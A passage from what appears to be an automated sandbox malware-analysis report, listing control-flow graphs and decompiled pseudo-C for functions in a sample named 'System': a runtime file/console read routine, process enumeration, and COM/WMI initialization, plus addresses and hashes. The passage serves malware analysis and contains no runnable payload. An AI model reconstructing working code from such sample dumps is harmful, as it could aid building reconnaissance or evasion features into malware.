1062->1067 1065->1066 1071 7ff6e4c78c71-7ff6e4c78c83 GetConsoleMode 1065->1071 1069 7ff6e4c78ce3-7ff6e4c78d03 ReadFile 1066->1069 1067->1052 1072 7ff6e4c78c09-7ff6e4c78c21 1067->1072 1075 7ff6e4c78d09-7ff6e4c78d11 1069->1075 1076 7ff6e4c78df6-7ff6e4c78dff GetLastError 1069->1076 1071->1066 1078 7ff6e4c78c85-7ff6e4c78c8d 1071->1078 1072->1052 1082 7ff6e4c78c23-7ff6e4c78c2f 1072->1082 1073->1077 1074->1049 1075->1076 1084 7ff6e4c78d17 1075->1084 1079 7ff6e4c78e1c-7ff6e4c78e1f 1076->1079 1080 7ff6e4c78e01-7ff6e4c78e17 call 7ff6e4c6c854 call 7ff6e4c6c834 1076->1080 1081 7ff6e4c78cc3-7ff6e4c78ccd call 7ff6e4c76b28 1077->1081 1078->1069 1086 7ff6e4c78c8f-7ff6e4c78cb1 ReadConsoleW 1078->1086 1090 7ff6e4c78cb9-7ff6e4c78cbb call 7ff6e4c6c7e4 1079->1090 1091 7ff6e4c78e25-7ff6e4c78e27 1079->1091 1080->1077 1081->1033 1082->1052 1089 7ff6e4c78c31-7ff6e4c78c33 1082->1089 1093 7ff6e4c78d1e-7ff6e4c78d33 1084->1093 1095 7ff6e4c78cb3 GetLastError 1086->1095 1096 7ff6e4c78cd2-7ff6e4c78cdc 1086->1096 1089->1052 1100 7ff6e4c78c35-7ff6e4c78c45 1089->1100 1090->1077 1091->1081 1093->1081 1102 7ff6e4c78d35-7ff6e4c78d40 1093->1102 1095->1090 1096->1093 1100->1052 1105 7ff6e4c78d67-7ff6e4c78d6f 1102->1105 1106 7ff6e4c78d42-7ff6e4c78d5b call 7ff6e4c78754 1102->1106 1107 7ff6e4c78de4-7ff6e4c78df1 call 7ff6e4c784e8 1105->1107 1108 7ff6e4c78d71-7ff6e4c78d83 1105->1108 1114 7ff6e4c78d60-7ff6e4c78d62 1106->1114 1107->1114 1111 7ff6e4c78dd7-7ff6e4c78ddf 1108->1111 1112 7ff6e4c78d85 1108->1112 1111->1081 1115 7ff6e4c78d8a-7ff6e4c78d91 1112->1115 1114->1081 1117 7ff6e4c78dcd-7ff6e4c78dd1 1115->1117 1118 7ff6e4c78d93-7ff6e4c78d97 1115->1118 1117->1111 1119 7ff6e4c78d99-7ff6e4c78da0 1118->1119 1120 7ff6e4c78db3 1118->1120 1119->1120 1121 7ff6e4c78da2-7ff6e4c78da6 1119->1121 1122 7ff6e4c78db9-7ff6e4c78dc9 1120->1122 1121->1120 1123 7ff6e4c78da8-7ff6e4c78db1 1121->1123 1122->1115 1124 7ff6e4c78dcb 1122->1124 1123->1122 1124->1111
                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                              			E00007FF67FF6E4C78A0C(void* __ebx, signed int __ecx, long long* __rax, long long __rbx, long long __rdx, long long __r9, char _a8, long long _a16, long long _a24, signed int _a32) {
				signed long long _v72;
				long long _v80;
				signed int _v88;
				signed long long _v96;
				void* _v104;
				unsigned long long _v120;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed char _t124;
				intOrPtr _t137;
				void* _t145;
				char _t156;
				char _t157;
				short _t159;
				void* _t165;
				signed int _t167;
				void* _t170;
				signed long long _t211;
				signed long long _t212;
				signed long long _t213;
				signed long long _t214;
				intOrPtr _t219;
				intOrPtr _t221;
				short* _t227;
				long long* _t229;
				signed long long _t234;
				void* _t236;
				intOrPtr _t243;
				signed long long _t259;
				unsigned long long _t276;
				void* _t278;
				unsigned long long _t279;
				signed long long _t287;
				signed long long _t288;
				unsigned long long _t289;
				intOrPtr* _t291;
				void* _t297;
				long long _t298;
				short* _t299;
				unsigned long long _t302;
				signed long long _t303;
				signed long long _t305;
				char* _t306;
				char* _t307;

				_a24 = __rbx;
				_a16 = __rdx;
				_t298 = __rdx;
				r13d = r8d;
				if (r12d != 0xfffffffe) goto 0xe4c78a4d;
				E00007FF67FF6E4C6C834(__rax);
				 *__rax = 0;
				E00007FF67FF6E4C6C854(__rax);
				 *__rax = 9;
				goto 0xe4c78e47;
				if (_t236 < 0) goto 0xe4c78e30;
				_t170 = r12d -  *0xe4cabb00; // 0x40
				if (_t170 >= 0) goto 0xe4c78e30;
				r9d = 1;
				_t211 = __ecx & 0x0000003f;
				_v80 = __r9;
				_t287 = __ecx >> 6;
				_v88 = _t287;
				_t303 = _t211 + _t211 * 8;
				if ((r9b &  *(0xe4cab700 + 0x38 + _t303 * 8)) == 0) goto 0xe4c78e30;
				if (r13d - 0x7fffffff <= 0) goto 0xe4c78abc;
				E00007FF67FF6E4C6C834(_t211);
				 *_t211 = 0;
				_t124 = E00007FF67FF6E4C6C854(_t211);
				 *_t211 = 0x16;
				goto 0xe4c78e42;
				if (r13d == 0) goto 0xe4c78e2c;
				if ((_t124 & 0x00000002) != 0) goto 0xe4c78e2c;
				if (__rdx == 0) goto 0xe4c78aa5;
				r11d =  *((char*)(0xe4cab700 + 0x39 + _t303 * 8));
				_t212 =  *((intOrPtr*)( *((intOrPtr*)(0xe4cab700 + _t287 * 8)) + 0x28 + _t303 * 8));
				_v96 = _t212;
				if (r11d != r9d) goto 0xe4c78b25;
				_t213 =  !_t212;
				if ((r9b & r13d) != 0) goto 0xe4c78b25;
				E00007FF67FF6E4C6C834(_t213);
				 *_t213 = 0;
				E00007FF67FF6E4C6C854(_t213);
				 *_t213 = 0x16;
				E00007FF67FF6E4C6A5D8();
				goto 0xe4c78cc0;
				goto 0xe4c78bbb;
				_t214 =  !_t213;
				if ((r9b & r13d) == 0) goto 0xe4c78b09;
				_t167 = r13d;
				_t278 =  <  ? 0x4 : _t276 >> 1;
				E00007FF67FF6E4C782BC(_t214, _t278);
				_t234 = _t214;
				E00007FF67FF6E4C76B28(_t214, 0);
				E00007FF67FF6E4C76B28(_t214, 0);
				_t305 = _t234;
				if (_t234 != 0) goto 0xe4c78b86;
				E00007FF67FF6E4C6C854(_t214);
				 *_t214 = 0xc;
				E00007FF67FF6E4C6C834(_t214);
				 *_t214 = 8;
				goto 0xe4c78cc0;
				r8d = 1;
				E00007FF67FF6E4C78FF8(0, 0);
				_t288 = _v88;
				r11b = _a8;
				r9d = 1;
				 *( *((intOrPtr*)(0xe4cab700 + _t288 * 8)) + 0x30 + _t303 * 8) = _t214;
				_t243 =  *((intOrPtr*)(0xe4cab700 + _t288 * 8));
				_v72 = _t305;
				r10d = 0xa;
				if (( *(_t243 + 0x38 + _t303 * 8) & 0x00000048) == 0) goto 0xe4c78c4a;
				_t137 =  *((intOrPtr*)(_t243 + 0x3a + _t303 * 8));
				if (_t137 == r10b) goto 0xe4c78c4a;
				if (_t278 == 0) goto 0xe4c78c4a;
				 *_t305 = _t137;
				_t279 = _t278 - 1;
				_t306 = _t305 + __r9;
				 *((intOrPtr*)( *((intOrPtr*)(0xe4cab700 + _t288 * 8)) + 0x3a + _t303 * 8)) = r10b;
				if (r11b == 0) goto 0xe4c78c4a;
				_t156 =  *((intOrPtr*)( *((intOrPtr*)(0xe4cab700 + _t288 * 8)) + 0x3b + _t303 * 8));
				if (_t156 == r10b) goto 0xe4c78c4a;
				if (_t279 == 0) goto 0xe4c78c4a;
				 *_t306 = _t156;
				_t307 = _t306 + __r9;
				 *((intOrPtr*)( *((intOrPtr*)(0xe4cab700 + _t288 * 8)) + 0x3b + _t303 * 8)) = r10b;
				if (r11b != r9b) goto 0xe4c78c4a;
				_t157 =  *((intOrPtr*)( *((intOrPtr*)(0xe4cab700 + _t288 * 8)) + 0x3c + _t303 * 8));
				if (_t157 == r10b) goto 0xe4c78c4a;
				if (_t279 - 1 == 0) goto 0xe4c78c4a;
				 *_t307 = _t157;
				_t219 =  *((intOrPtr*)(0xe4cab700 + _t288 * 8));
				 *((intOrPtr*)(_t219 + 0x3c + _t303 * 8)) = r10b;
				E00007FF67FF6E4C81C3C(r12d, _t219);
				if (_t219 == 0) goto 0xe4c78cde;
				_t221 =  *((intOrPtr*)(0xe4cab700 + _v88 * 8));
				if ( *((intOrPtr*)(_t221 + 0x38 + _t303 * 8)) - sil >= 0) goto 0xe4c78cde;
				GetConsoleMode(??, ??);
				if (_t221 == 0) goto 0xe4c78cde;
				if (_a8 != 2) goto 0xe4c78ce3;
				r8d = _t167;
				_v120 = 0;
				ReadConsoleW(??, ??, ??, ??, ??);
				if (_t221 != 0) goto 0xe4c78cd2;
				GetLastError();
				E00007FF67FF6E4C6C7E4(r12d, _t221, _t234);
				E00007FF67FF6E4C76B28(_t221, _t234);
				goto 0xe4c78e4a;
				goto 0xe4c78d1e;
				_v80 = sil;
				r8d = _t167;
				_v120 = 0;
				ReadFile(??, ??, ??, ??, ??); // executed
				if (_a32 == 0) goto 0xe4c78df6;
				if (_a32 - r13d > 0) goto 0xe4c78df6;
				if ( *((intOrPtr*)( *((intOrPtr*)(0xe4cab700 + _v88 * 8)) + 0x38 + _t303 * 8)) - sil >= 0) goto 0xe4c78cc3;
				_t289 = _t298 - 7;
				if (_a8 == 2) goto 0xe4c78d67;
				_t259 = _t307 + __r9;
				_t159 = r12d;
				_v120 = _t302 >> 1;
				_t145 = E00007FF67FF6E4C78754(__ebx, _t159, _t298 - 7, _t167, _a8 - 2, _t234, _t259, 0xffffffff + _a32 * 2 + _a32, 0, _t279 >> 1, _t289, _a16);
				goto 0xe4c78cc3;
				if (_v80 == sil) goto 0xe4c78de4;
				_t299 = _v72;
				_t227 = _t299;
				_t297 = _t299 + (_t289 >> 1) * 2;
				if (_t299 - _t297 >= 0) goto 0xe4c78dd7;
				if (_v96 == 0x1a) goto 0xe4c78dcd;
				if (_t159 != 0xd) goto 0xe4c78db3;
				_t291 = _t227 + 2;
				if (_t291 - _t297 >= 0) goto 0xe4c78db3;
				if ( *_t291 != _t165) goto 0xe4c78db3;
				r8d = 4;
				goto 0xe4c78db9;
				r8d = 2;
				 *_t299 = _t159;
				if (_t227 + _t291 - _t297 < 0) goto 0xe4c78d8a;
				goto 0xe4c78dd7;
				_t229 =  *((intOrPtr*)(0xe4cab700 + _t259 * 8));
				 *(_t229 + 0x38 + _t303 * 8) =  *(_t229 + 0x38 + _t303 * 8) | 0x00000002;
				goto 0xe4c78cc3;
				E00007FF67FF6E4C784E8(_t145, r12d, _v72, _t299 + 2);
				goto 0xe4c78d60;
				GetLastError();
				if (_t229 != 5) goto 0xe4c78e1c;
				E00007FF67FF6E4C6C854(_t229);
				 *_t229 = 9;
				E00007FF67FF6E4C6C834(_t229);
				 *_t229 = 5;
				goto 0xe4c78cc0;
				if (_t229 != 0x6d) goto 0xe4c78cb9;
				goto 0xe4c78cc3;
				goto 0xe4c78e4a;
				E00007FF67FF6E4C6C834(0);
				 *0x00000000 = 0xa;
				E00007FF67FF6E4C6C854(0);
				 *0x00000000 = 9;
				return E00007FF67FF6E4C6A5D8();
			}
















































                                                                                                                                                              0x7ff6e4c78a0c
                                                                                                                                                              0x7ff6e4c78a11
                                                                                                                                                              0x7ff6e4c78a28
                                                                                                                                                              0x7ff6e4c78a2b
                                                                                                                                                              0x7ff6e4c78a32
                                                                                                                                                              0x7ff6e4c78a34
                                                                                                                                                              0x7ff6e4c78a3b
                                                                                                                                                              0x7ff6e4c78a3d
                                                                                                                                                              0x7ff6e4c78a42
                                                                                                                                                              0x7ff6e4c78a48
                                                                                                                                                              0x7ff6e4c78a51
                                                                                                                                                              0x7ff6e4c78a57
                                                                                                                                                              0x7ff6e4c78a5e
                                                                                                                                                              0x7ff6e4c78a67
                                                                                                                                                              0x7ff6e4c78a6b
                                                                                                                                                              0x7ff6e4c78a6e
                                                                                                                                                              0x7ff6e4c78a7d
                                                                                                                                                              0x7ff6e4c78a81
                                                                                                                                                              0x7ff6e4c78a86
                                                                                                                                                              0x7ff6e4c78a96
                                                                                                                                                              0x7ff6e4c78aa3
                                                                                                                                                              0x7ff6e4c78aa5
                                                                                                                                                              0x7ff6e4c78aaa
                                                                                                                                                              0x7ff6e4c78aac
                                                                                                                                                              0x7ff6e4c78ab1
                                                                                                                                                              0x7ff6e4c78ab7
                                                                                                                                                              0x7ff6e4c78abf
                                                                                                                                                              0x7ff6e4c78ac7
                                                                                                                                                              0x7ff6e4c78ad0
                                                                                                                                                              0x7ff6e4c78ad2
                                                                                                                                                              0x7ff6e4c78adb
                                                                                                                                                              0x7ff6e4c78ae3
                                                                                                                                                              0x7ff6e4c78afd
                                                                                                                                                              0x7ff6e4c78b02
                                                                                                                                                              0x7ff6e4c78b07
                                                                                                                                                              0x7ff6e4c78b09
                                                                                                                                                              0x7ff6e4c78b0e
                                                                                                                                                              0x7ff6e4c78b10
                                                                                                                                                              0x7ff6e4c78b15
                                                                                                                                                              0x7ff6e4c78b1b
                                                                                                                                                              0x7ff6e4c78b20
                                                                                                                                                              0x7ff6e4c78b32
                                                                                                                                                              0x7ff6e4c78b3a
                                                                                                                                                              0x7ff6e4c78b3f
                                                                                                                                                              0x7ff6e4c78b41
                                                                                                                                                              0x7ff6e4c78b48
                                                                                                                                                              0x7ff6e4c78b4d
                                                                                                                                                              0x7ff6e4c78b54
                                                                                                                                                              0x7ff6e4c78b57
                                                                                                                                                              0x7ff6e4c78b5e
                                                                                                                                                              0x7ff6e4c78b63
                                                                                                                                                              0x7ff6e4c78b69
                                                                                                                                                              0x7ff6e4c78b6b
                                                                                                                                                              0x7ff6e4c78b70
                                                                                                                                                              0x7ff6e4c78b76
                                                                                                                                                              0x7ff6e4c78b7b
                                                                                                                                                              0x7ff6e4c78b81
                                                                                                                                                              0x7ff6e4c78b8b
                                                                                                                                                              0x7ff6e4c78b8f
                                                                                                                                                              0x7ff6e4c78b94
                                                                                                                                                              0x7ff6e4c78ba0
                                                                                                                                                              0x7ff6e4c78ba8
                                                                                                                                                              0x7ff6e4c78bb2
                                                                                                                                                              0x7ff6e4c78bb7
                                                                                                                                                              0x7ff6e4c78bc3
                                                                                                                                                              0x7ff6e4c78bc8
                                                                                                                                                              0x7ff6e4c78bce
                                                                                                                                                              0x7ff6e4c78bd0
                                                                                                                                                              0x7ff6e4c78bd8
                                                                                                                                                              0x7ff6e4c78bdc
                                                                                                                                                              0x7ff6e4c78bde
                                                                                                                                                              0x7ff6e4c78be1
                                                                                                                                                              0x7ff6e4c78be7
                                                                                                                                                              0x7ff6e4c78bed
                                                                                                                                                              0x7ff6e4c78bf5
                                                                                                                                                              0x7ff6e4c78bfb
                                                                                                                                                              0x7ff6e4c78c03
                                                                                                                                                              0x7ff6e4c78c07
                                                                                                                                                              0x7ff6e4c78c09
                                                                                                                                                              0x7ff6e4c78c14
                                                                                                                                                              0x7ff6e4c78c19
                                                                                                                                                              0x7ff6e4c78c21
                                                                                                                                                              0x7ff6e4c78c27
                                                                                                                                                              0x7ff6e4c78c2f
                                                                                                                                                              0x7ff6e4c78c33
                                                                                                                                                              0x7ff6e4c78c35
                                                                                                                                                              0x7ff6e4c78c3c
                                                                                                                                                              0x7ff6e4c78c45
                                                                                                                                                              0x7ff6e4c78c4d
                                                                                                                                                              0x7ff6e4c78c54
                                                                                                                                                              0x7ff6e4c78c66
                                                                                                                                                              0x7ff6e4c78c6f
                                                                                                                                                              0x7ff6e4c78c7b
                                                                                                                                                              0x7ff6e4c78c83
                                                                                                                                                              0x7ff6e4c78c8d
                                                                                                                                                              0x7ff6e4c78ca1
                                                                                                                                                              0x7ff6e4c78ca4
                                                                                                                                                              0x7ff6e4c78ca9
                                                                                                                                                              0x7ff6e4c78cb1
                                                                                                                                                              0x7ff6e4c78cb3
                                                                                                                                                              0x7ff6e4c78cbb
                                                                                                                                                              0x7ff6e4c78cc6
                                                                                                                                                              0x7ff6e4c78ccd
                                                                                                                                                              0x7ff6e4c78cdc
                                                                                                                                                              0x7ff6e4c78cde
                                                                                                                                                              0x7ff6e4c78cf0
                                                                                                                                                              0x7ff6e4c78cf3
                                                                                                                                                              0x7ff6e4c78cfb
                                                                                                                                                              0x7ff6e4c78d03
                                                                                                                                                              0x7ff6e4c78d11
                                                                                                                                                              0x7ff6e4c78d33
                                                                                                                                                              0x7ff6e4c78d3d
                                                                                                                                                              0x7ff6e4c78d40
                                                                                                                                                              0x7ff6e4c78d50
                                                                                                                                                              0x7ff6e4c78d53
                                                                                                                                                              0x7ff6e4c78d56
                                                                                                                                                              0x7ff6e4c78d5b
                                                                                                                                                              0x7ff6e4c78d62
                                                                                                                                                              0x7ff6e4c78d6f
                                                                                                                                                              0x7ff6e4c78d71
                                                                                                                                                              0x7ff6e4c78d76
                                                                                                                                                              0x7ff6e4c78d7c
                                                                                                                                                              0x7ff6e4c78d83
                                                                                                                                                              0x7ff6e4c78d91
                                                                                                                                                              0x7ff6e4c78d97
                                                                                                                                                              0x7ff6e4c78d99
                                                                                                                                                              0x7ff6e4c78da0
                                                                                                                                                              0x7ff6e4c78da6
                                                                                                                                                              0x7ff6e4c78dab
                                                                                                                                                              0x7ff6e4c78db1
                                                                                                                                                              0x7ff6e4c78db3
                                                                                                                                                              0x7ff6e4c78dbc
                                                                                                                                                              0x7ff6e4c78dc9
                                                                                                                                                              0x7ff6e4c78dcb
                                                                                                                                                              0x7ff6e4c78dcd
                                                                                                                                                              0x7ff6e4c78dd1
                                                                                                                                                              0x7ff6e4c78ddf
                                                                                                                                                              0x7ff6e4c78dec
                                                                                                                                                              0x7ff6e4c78df1
                                                                                                                                                              0x7ff6e4c78df6
                                                                                                                                                              0x7ff6e4c78dff
                                                                                                                                                              0x7ff6e4c78e01
                                                                                                                                                              0x7ff6e4c78e06
                                                                                                                                                              0x7ff6e4c78e0c
                                                                                                                                                              0x7ff6e4c78e11
                                                                                                                                                              0x7ff6e4c78e17
                                                                                                                                                              0x7ff6e4c78e1f
                                                                                                                                                              0x7ff6e4c78e27
                                                                                                                                                              0x7ff6e4c78e2e
                                                                                                                                                              0x7ff6e4c78e30
                                                                                                                                                              0x7ff6e4c78e35
                                                                                                                                                              0x7ff6e4c78e37
                                                                                                                                                              0x7ff6e4c78e3c
                                                                                                                                                              0x7ff6e4c78e61

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: 7d65298988323243bff5a5ad8deacda80ed3290f8eb2ca76a4b7fc4b4f0f433c
                                                                                                                                                              • Instruction ID: d02b23051f4aa5ffeb5b83e2230b3d2e82c996c97a441d9a604a79d4fa8e1d33
                                                                                                                                                              • Opcode Fuzzy Hash: 7d65298988323243bff5a5ad8deacda80ed3290f8eb2ca76a4b7fc4b4f0f433c
                                                                                                                                                              • Instruction Fuzzy Hash: D0C1C62BE4C68782E6609B3594883796A70FB91F90F454133DB4E837D1CE7EE455C32A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C45470 Relevance: 9.1, APIs: 6, Instructions: 53processCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process32$Next$CloseCreateFirstHandleOpenProcessSnapshotToolhelp32_invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 729873580-0
                                                                                                                                                              • Opcode ID: 39cc5cf5ac709e53cc9a3a7ff97a1199afce99bb37955619f3a5a1c925ce8516
                                                                                                                                                              • Instruction ID: f518360bb3057f59308bb381ac7f8fa9ac561e6c7da325f64a0781616002f61c
                                                                                                                                                              • Opcode Fuzzy Hash: 39cc5cf5ac709e53cc9a3a7ff97a1199afce99bb37955619f3a5a1c925ce8516
                                                                                                                                                              • Instruction Fuzzy Hash: F0213036A5864681EA208B21E58436A77B1FB4DFC4F844132DE4E87754DF3EE549C705
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C4DFE0 Relevance: 7.6, APIs: 5, Instructions: 92comCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 23%
                                                                                                                                                              			E00007FF67FF6E4C4DFE0(long long __rbx, void* __rcx, long long __rsi) {
				void* _t47;
				void* _t50;
				void* _t52;
				void* _t55;
				signed long long _t69;
				signed long long _t70;
				long long _t71;
				long long _t72;
				long long _t74;
				long long* _t78;
				long long* _t79;
				void* _t85;
				void* _t101;
				void* _t108;
				void* _t109;
				void* _t111;
				signed long long _t112;
				void* _t114;
				long long _t117;
				void* _t119;
				void* _t121;

				 *((long long*)(_t111 + 0x10)) = __rbx;
				 *((long long*)(_t111 + 0x18)) = __rsi;
				_t109 = _t111 - 0x37;
				_t112 = _t111 - 0x100;
				_t69 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_t70 = _t69 ^ _t112;
				 *(_t109 + 0x27) = _t70;
				r8d = 0xc7;
				E00007FF67FF6E4C64A30(_t47, _t55, __rcx, 0, _t114);
				__imp__CoInitializeEx(_t121, _t119, _t117, _t101, _t108);
				if (_t70 < 0) goto 0xe4c4e1bc;
				r12d = 0;
				 *((long long*)(_t112 + 0x40)) = _t117;
				 *((intOrPtr*)(_t112 + 0x38)) = r12d;
				 *((long long*)(_t112 + 0x30)) = _t117;
				 *((long long*)(_t112 + 0x28)) = 3;
				 *((intOrPtr*)(_t112 + 0x20)) = r12d;
				r9d = 0;
				r8d = 0;
				__imp__CoInitializeSecurity(); // executed
				if (_t70 < 0) goto 0xe4c4e1b6;
				 *((long long*)(_t109 - 0x51)) = _t117;
				_t71 = _t109 - 0x51;
				 *((long long*)(_t112 + 0x20)) = _t71;
				_t14 = _t117 + 1; // 0x1
				r8d = _t14;
				__imp__CoCreateInstance();
				if (_t71 < 0) goto 0xe4c4e1b6;
				 *((long long*)(_t109 - 0x59)) = _t117;
				_t72 =  *((intOrPtr*)(_t109 - 0x51));
				_t85 =  *_t72;
				_t18 = _t117 + 0x18; // 0x18
				E00007FF67FF6E4C623D8(_t72, _t85);
				_t78 = _t72;
				 *((long long*)(_t109 - 0x79)) = _t72;
				if (_t72 == 0) goto 0xe4c4e0ef;
				asm("xorps xmm0, xmm0");
				asm("movups [ebx], xmm0");
				 *((long long*)(_t78 + 0x10)) = 0;
				 *((long long*)(_t78 + 8)) = _t117;
				 *((long long*)(_t78 + 0x10)) = 1;
				__imp__#2();
				 *_t78 = 0;
				if (0 == 0) goto 0xe4c4e54d;
				goto 0xe4c4e0f2;
				_t79 = _t117;
				 *((long long*)(_t109 - 0x71)) = _t79;
				if (_t79 == 0) goto 0xe4c4e558;
				_t74 = _t109 - 0x59;
				 *((long long*)(_t112 + 0x40)) = _t74;
				 *((long long*)(_t112 + 0x38)) = _t117;
				 *((long long*)(_t112 + 0x30)) = _t117;
				 *((intOrPtr*)(_t112 + 0x28)) = r12d;
				 *((long long*)(_t112 + 0x20)) = _t117;
				r9d = 0;
				r8d = 0;
				_t50 =  *((long long*)( *((intOrPtr*)(_t85 + 0x18))))();
				asm("adc [ebx+0x307501f9], al");
				if ( *_t79 == 0) goto 0xe4c4e14d;
				__imp__#6();
				 *_t79 = _t117;
				if ( *((intOrPtr*)(_t79 + 8)) == 0) goto 0xe4c4e15f;
				0xe4c623d0();
				 *((long long*)(_t79 + 8)) = _t117;
				 *[fs:rax] =  *[fs:rax] + _t50;
				if (_t74 < 0) goto 0xe4c4e1ac;
				 *((intOrPtr*)(_t112 + 0x38)) = r12d;
				 *((long long*)(_t112 + 0x30)) = _t117;
				 *((long long*)(_t112 + 0x28)) = 3;
				 *((long long*)(_t112 + 0x20)) = 3;
				r9d = 0;
				r8d = 0;
				__imp__CoSetProxyBlanket();
				if (_t74 >= 0) goto 0xe4c4e1e4;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 - 0x59)))) + 0x10))();
				_t52 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 - 0x51)))) + 0x10))();
				__imp__CoUninitialize();
				return E00007FF67FF6E4C623B0(_t52, _t18,  *(_t109 + 0x27) ^ _t112);
			}
























                                                                                                                                                              0x7ff6e4c4dfe0
                                                                                                                                                              0x7ff6e4c4dfe5
                                                                                                                                                              0x7ff6e4c4dff2
                                                                                                                                                              0x7ff6e4c4dff7
                                                                                                                                                              0x7ff6e4c4dffe
                                                                                                                                                              0x7ff6e4c4e005
                                                                                                                                                              0x7ff6e4c4e008
                                                                                                                                                              0x7ff6e4c4e011
                                                                                                                                                              0x7ff6e4c4e017
                                                                                                                                                              0x7ff6e4c4e020
                                                                                                                                                              0x7ff6e4c4e028
                                                                                                                                                              0x7ff6e4c4e02e
                                                                                                                                                              0x7ff6e4c4e031
                                                                                                                                                              0x7ff6e4c4e036
                                                                                                                                                              0x7ff6e4c4e03b
                                                                                                                                                              0x7ff6e4c4e040
                                                                                                                                                              0x7ff6e4c4e048
                                                                                                                                                              0x7ff6e4c4e04d
                                                                                                                                                              0x7ff6e4c4e050
                                                                                                                                                              0x7ff6e4c4e05a
                                                                                                                                                              0x7ff6e4c4e062
                                                                                                                                                              0x7ff6e4c4e068
                                                                                                                                                              0x7ff6e4c4e06c
                                                                                                                                                              0x7ff6e4c4e070
                                                                                                                                                              0x7ff6e4c4e07e
                                                                                                                                                              0x7ff6e4c4e07e
                                                                                                                                                              0x7ff6e4c4e08a
                                                                                                                                                              0x7ff6e4c4e092
                                                                                                                                                              0x7ff6e4c4e098
                                                                                                                                                              0x7ff6e4c4e09c
                                                                                                                                                              0x7ff6e4c4e0a0
                                                                                                                                                              0x7ff6e4c4e0a7
                                                                                                                                                              0x7ff6e4c4e0ac
                                                                                                                                                              0x7ff6e4c4e0b1
                                                                                                                                                              0x7ff6e4c4e0b4
                                                                                                                                                              0x7ff6e4c4e0bb
                                                                                                                                                              0x7ff6e4c4e0bd
                                                                                                                                                              0x7ff6e4c4e0c2
                                                                                                                                                              0x7ff6e4c4e0c5
                                                                                                                                                              0x7ff6e4c4e0c9
                                                                                                                                                              0x7ff6e4c4e0cd
                                                                                                                                                              0x7ff6e4c4e0db
                                                                                                                                                              0x7ff6e4c4e0e1
                                                                                                                                                              0x7ff6e4c4e0e7
                                                                                                                                                              0x7ff6e4c4e0ed
                                                                                                                                                              0x7ff6e4c4e0ef
                                                                                                                                                              0x7ff6e4c4e0f2
                                                                                                                                                              0x7ff6e4c4e0f9
                                                                                                                                                              0x7ff6e4c4e0ff
                                                                                                                                                              0x7ff6e4c4e103
                                                                                                                                                              0x7ff6e4c4e108
                                                                                                                                                              0x7ff6e4c4e10d
                                                                                                                                                              0x7ff6e4c4e112
                                                                                                                                                              0x7ff6e4c4e117
                                                                                                                                                              0x7ff6e4c4e11c
                                                                                                                                                              0x7ff6e4c4e11f
                                                                                                                                                              0x7ff6e4c4e129
                                                                                                                                                              0x7ff6e4c4e136
                                                                                                                                                              0x7ff6e4c4e142
                                                                                                                                                              0x7ff6e4c4e144
                                                                                                                                                              0x7ff6e4c4e14a
                                                                                                                                                              0x7ff6e4c4e154
                                                                                                                                                              0x7ff6e4c4e156
                                                                                                                                                              0x7ff6e4c4e15b
                                                                                                                                                              0x7ff6e4c4e168
                                                                                                                                                              0x7ff6e4c4e16e
                                                                                                                                                              0x7ff6e4c4e170
                                                                                                                                                              0x7ff6e4c4e175
                                                                                                                                                              0x7ff6e4c4e17a
                                                                                                                                                              0x7ff6e4c4e182
                                                                                                                                                              0x7ff6e4c4e18a
                                                                                                                                                              0x7ff6e4c4e18d
                                                                                                                                                              0x7ff6e4c4e198
                                                                                                                                                              0x7ff6e4c4e1a0
                                                                                                                                                              0x7ff6e4c4e1a9
                                                                                                                                                              0x7ff6e4c4e1b3
                                                                                                                                                              0x7ff6e4c4e1b6
                                                                                                                                                              0x7ff6e4c4e1e3

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
